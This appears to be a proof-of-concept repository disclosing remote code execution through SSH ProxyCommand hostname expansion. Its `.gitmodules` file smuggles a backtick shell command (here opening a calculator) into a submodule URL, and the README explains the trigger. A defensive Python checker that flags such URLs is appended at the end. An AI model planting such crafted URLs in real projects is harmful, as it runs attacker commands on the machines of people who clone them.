├── .gitmodules
└── README.md

/.gitmodules:
--------------------------------------------------------------------------------
[submodule "cves"]
	path = cves
	url = ssh://'`open -aCalculator`'foo.example.com/bar
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
## RCE via insecure `~/.ssh/config`

Tokens such as `%h` and `%p` in `ProxyCommand` are widely used to tunnel and proxy SSH connections. Because `ProxyCommand` is passed to the user's shell after token expansion, a hostname that carries shell metacharacters is expanded into the command line.

### Vulnerable config

```
host *.example.com
    ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
```

Note: in my initial assessment I was under the impression that using `'%h'` (single quotes) would avoid this, but it looks like that is still going to be vulnerable with something like:

```
url = ssh://'`open -aCalculator`'foo.example.com/bar
```

Taken from: https://man.openbsd.org/ssh_config#ProxyCommand

### What is in this repository

A submodule which would exploit this vulnerability to pop a calculator on OSX.

Try it out using: `git clone https://github.com/vin01/poc-proxycommand-vulnerable-v2 --recurse-submodules`
--------------------------------------------------------------------------------
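As an added defensive check (not code from this repository), the script below parses a `.gitmodules` file before a `--recurse-submodules` clone and flags any submodule whose URL would hand ssh a `%h` value that is not a plain DNS name. The `.gitmodules` text is constructed here to mirror this repository's entry plus one benign entry; the helper names are the example's own.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: this repository's .gitmodules entry plus one benign entry.
SAMPLE_GITMODULES = """\
[submodule "cves"]
\tpath = cves
\turl = ssh://'`open -aCalculator`'foo.example.com/bar
[submodule "safe"]
\tpath = safe
\turl = git@github.com:example/safe-module.git
"""

SECTION = re.compile(r'^\s*\[submodule\s+"([^"]*)"\]\s*$')
KEYVAL = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')
SSH_SCHEMES = {"ssh", "git+ssh", "ssh+git"}
# Safe %h: DNS characters only; no leading '-' (option injection), quotes, backticks or spaces.
SAFE_HOST = re.compile(r"^[a-z0-9]([a-z0-9.-]*[a-z0-9])?$")

def parse_gitmodules(text):
    """Minimal reader for the [submodule "name"] sections of .gitmodules."""
    modules, current = {}, None
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(("#", ";")):
            continue
        if m := SECTION.match(line):
            current = modules.setdefault(m.group(1), {})
        elif (m := KEYVAL.match(line)) and current is not None:
            current[m.group(1).lower()] = m.group(2)
    return modules

def ssh_host(url):
    """Host ssh would expand as %h, or None when the URL never reaches ssh."""
    scheme, sep, _ = url.partition("://")
    if sep:
        if scheme.lower() not in SSH_SCHEMES:
            return None  # http(s)://, git://, file:// do not spawn ssh
        return urlsplit(url).hostname  # drops user@ and :port, lowercases
    m = re.match(r"^(?:[^@/]+@)?([^:/]+):", url)  # scp-like [user@]host:path
    return m.group(1).lower() if m else None

def find_unsafe_submodules(text):
    """[(name, host)] for every submodule whose ssh host is not a plain DNS name."""
    flagged = []
    for name, cfg in parse_gitmodules(text).items():
        host = ssh_host(cfg.get("url", ""))
        if host is not None and not SAFE_HOST.match(host):
            flagged.append((name, host))
    return flagged
```

Run `find_unsafe_submodules` over the real file before cloning with `--recurse-submodules` and abort if it returns anything; the sample above flags `cves` and passes `safe`.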